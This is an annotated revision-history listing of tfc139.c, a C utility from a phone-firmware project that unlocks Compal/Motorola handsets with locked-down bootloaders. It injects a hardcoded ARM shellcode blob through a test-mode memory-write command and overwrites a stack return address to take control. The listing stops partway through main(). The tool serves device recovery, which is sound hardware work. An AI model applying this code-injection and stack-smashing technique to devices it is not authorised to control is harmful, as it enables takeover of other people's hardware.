annotate rvinterf/lowlevel/tfc139.c @ 1012:93f4fc26b204

fc-shell: arbitrary send command implemented in one-shot mode
author Mychaela Falconia <falcon@ivan.Harhan.ORG>
date Sun, 20 Mar 2016 22:06:11 +0000
parents 65418b391513
children
Ignore whitespace changes - Everywhere: Within whitespace: At end of lines:
rev   line source
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
1 /*
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
2 * This program facilitates the recovery of those Compal/Motorola phones
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
3 * whose bootloaders have been maliciously locked down. It connects
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
4 * to a running Mot C1xx firmware through the RVTMUX interface provided
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
5 * by the latter and uses the Test Mode memory write command (which
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
6 * these firmwares implement just like TI's reference fw) to inject
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
7 * some shellcode and to transfer control to it by overwriting a
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
8 * function return address on the stack. The injected shellcode then
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
9 * enables the Calypso boot ROM and jumps to it, allowing fc-loadtool
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
10 * to take over from there.
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
11 */
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
12
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
13 #include <sys/types.h>
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
14 #include <sys/errno.h>
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
15 #include <stdio.h>
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
16 #include <string.h>
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
17 #include <strings.h>
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
18 #include <stdlib.h>
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
19 #include <unistd.h>
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
20 #include <time.h>
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
21 #include "../include/pktmux.h"
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
22 #include "../include/limits.h"
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
23
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
24 extern int target_fd;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
25 extern char *baudrate_name;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
26
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
27 extern u_char rxpkt[];
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
28 extern size_t rxpkt_len;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
29
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
30 char *logfname;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
31 FILE *logF;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
32 time_t logtime;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
33 int no_output; /* for output.c */
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
34
983
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
35 int wakeup_after_sec = 1;
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
36
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
37 /* see ../../target-utils/tf-breakin/payload.S for the source */
983
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
38 static u_char shellcode[114] = {
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
39 0x78, 0x47, 0xC0, 0x46, 0xD3, 0xF0, 0x21, 0xE3,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
40 0x50, 0x10, 0x9F, 0xE5, 0xF5, 0x00, 0xA0, 0xE3,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
41 0xB2, 0x00, 0xC1, 0xE1, 0xA0, 0x00, 0xA0, 0xE3,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
42 0xB2, 0x00, 0xC1, 0xE1, 0x40, 0x60, 0x9F, 0xE5,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
43 0x05, 0x00, 0xD6, 0xE5, 0x20, 0x00, 0x10, 0xE3,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
44 0xFC, 0xFF, 0xFF, 0x0A, 0x38, 0x10, 0x8F, 0xE2,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
45 0x06, 0x20, 0xA0, 0xE3, 0x01, 0x00, 0xD1, 0xE4,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
46 0x00, 0x00, 0xC6, 0xE5, 0x01, 0x20, 0x52, 0xE2,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
47 0xFB, 0xFF, 0xFF, 0x1A, 0x05, 0x00, 0xD6, 0xE5,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
48 0x40, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
49 0x10, 0x10, 0x9F, 0xE5, 0x01, 0x2C, 0xA0, 0xE3,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
50 0xB0, 0x20, 0xC1, 0xE1, 0x00, 0xF0, 0xA0, 0xE3,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
51 0x02, 0xF8, 0xFF, 0xFF, 0x00, 0x58, 0xFF, 0xFF,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
52 0x10, 0xFB, 0xFF, 0xFF, 0x02, 0x02, 0x02, 0x4F,
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
53 0x4B, 0x02
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
54 };
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
55
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
56 static unsigned shellcode_load_addr;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
57 static unsigned stack_smash_addr;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
58 static int thumb_entry = 1;
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
59
360
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
60 static u_char stack_smash_payload[4];
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
61 static int breakin_in_progress;
360
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
62
418
a9bf3e92a30c tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 361
diff changeset
63 static char *target_tty_port;
a9bf3e92a30c tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 361
diff changeset
64
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
65 static void
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
66 send_compal_memwrite(addr, payload, payload_len)
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
67 unsigned addr;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
68 u_char *payload;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
69 {
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
70 u_char pkt[MAX_PKT_TO_TARGET];
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
71 int i, csum, csum_offset;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
72
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
73 pkt[0] = RVT_TM_HEADER;
975
0d7cc054ef72 rvinterf/lowlevel: updates for the new knowledge of TM predating ETM
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 432
diff changeset
74 pkt[1] = 0x40; /* old TM3 MEM_WRITE command */
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
75 pkt[2] = addr;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
76 pkt[3] = addr >> 8;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
77 pkt[4] = addr >> 16;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
78 pkt[5] = addr >> 24;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
79 bcopy(payload, pkt + 6, payload_len);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
80 csum_offset = payload_len + 6;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
81 csum = 0;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
82 for (i = 1; i < csum_offset; i++)
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
83 csum ^= pkt[i];
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
84 pkt[i] = csum;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
85 send_pkt_to_target(pkt, i + 1);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
86 }
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
87
983
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
88 static void
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
89 initiate_breakin()
983
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
90 {
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
91 char msgbuf[80];
983
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
92 unsigned jump_addr;
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
93
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
94 sprintf(msgbuf,
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
95 "Using shellcode load addr 0x%x, stack smash starting addr 0x%x",
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
96 shellcode_load_addr, stack_smash_addr);
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
97 output_line(msgbuf);
983
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
98 jump_addr = shellcode_load_addr;
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
99 if (thumb_entry)
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
100 jump_addr += 1;
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
101 else
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
102 jump_addr += 4;
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
103 stack_smash_payload[0] = jump_addr;
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
104 stack_smash_payload[1] = jump_addr >> 8;
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
105 stack_smash_payload[2] = jump_addr >> 16;
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
106 stack_smash_payload[3] = jump_addr >> 24;
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
107 output_line("Sending shellcode RAM write");
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
108 send_compal_memwrite(shellcode_load_addr, shellcode, sizeof shellcode);
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
109 breakin_in_progress = 1;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
110 }
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
111
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
112 static void
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
113 send_memcheck_query()
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
114 {
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
115 u_char sendpkt[25];
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
116
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
117 output_line("Sending GPF MEMCHECK query");
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
118 /* fill out the packet */
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
119 sendpkt[0] = RVT_L23_HEADER;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
120 sendpkt[1] = 0xB7; /* system prim */
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
121 sendpkt[2] = 20;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
122 sendpkt[3] = 0;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
123 /* send zeros for the timestamp */
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
124 sendpkt[4] = 0;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
125 sendpkt[5] = 0;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
126 sendpkt[6] = 0;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
127 sendpkt[7] = 0;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
128 /* fixed string with all fields */
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
129 strcpy(sendpkt + 8, "PCO L1 MEMCHECK");
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
130 /* send it! */
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
131 send_pkt_to_target(sendpkt, 24);
983
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
132 }
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
133
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
134 main(argc, argv)
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
135 char **argv;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
136 {
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
137 extern char *optarg;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
138 extern int optind;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
139 int c;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
140 fd_set fds;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
141
432
15e69d31c96f tfc139: allow -B option just like rvtdump and rvinterf
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 419
diff changeset
142 baudrate_name = "57600"; /* what C139 firmware uses */
986
65418b391513 tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 985
diff changeset
143 while ((c = getopt(argc, argv, "a:AB:l:ms:w:")) != EOF)
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
144 switch (c) {
419
3a46728e054b tfc139: -a and -s options to override IRAM payload and stack smash addresses
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 418
diff changeset
145 case 'a':
983
7166c8311b0d tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 975
diff changeset
146 shellcode_load_addr = strtoul(optarg, 0, 16);
419
3a46728e054b tfc139: -a and -s options to override IRAM payload and stack smash addresses
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 418
diff changeset
147 continue;
432
15e69d31c96f tfc139: allow -B option just like rvtdump and rvinterf
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 419
diff changeset
148 case 'B':
15e69d31c96f tfc139: allow -B option just like rvtdump and rvinterf
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 419
diff changeset
149 baudrate_name = optarg;
15e69d31c96f tfc139: allow -B option just like rvtdump and rvinterf
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 419
diff changeset
150 continue;
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
151 case 'l':
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
152 logfname = optarg;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
153 continue;
986
65418b391513 tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 985
diff changeset
154 case 'm':
65418b391513 tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 985
diff changeset
155 /* mimic mot931c.exe */
65418b391513 tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 985
diff changeset
156 shellcode_load_addr = 0x800000;
65418b391513 tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 985
diff changeset
157 stack_smash_addr = 0x837C54;
65418b391513 tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 985
diff changeset
158 /* FALL THRU */
65418b391513 tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 985
diff changeset
159 case 'A':
65418b391513 tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 985
diff changeset
160 thumb_entry = 0;
65418b391513 tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 985
diff changeset
161 continue;
419
3a46728e054b tfc139: -a and -s options to override IRAM payload and stack smash addresses
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 418
diff changeset
162 case 's':
3a46728e054b tfc139: -a and -s options to override IRAM payload and stack smash addresses
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 418
diff changeset
163 stack_smash_addr = strtoul(optarg, 0, 16);
3a46728e054b tfc139: -a and -s options to override IRAM payload and stack smash addresses
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 418
diff changeset
164 continue;
360
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
165 case 'w':
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
166 wakeup_after_sec = strtoul(optarg, 0, 0);
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
167 continue;
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
168 case '?':
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
169 default:
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
170 usage: fprintf(stderr,
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
171 "usage: %s [options] ttyport\n", argv[0]);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
172 exit(1);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
173 }
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
174 if (argc - optind != 1)
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
175 goto usage;
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
176 if (stack_smash_addr && !shellcode_load_addr) {
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
177 fprintf(stderr, "usage error: -a option required with -s\n");
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
178 exit(1);
8c83777f856c tfc139 reworked for the new "universal" break-in method
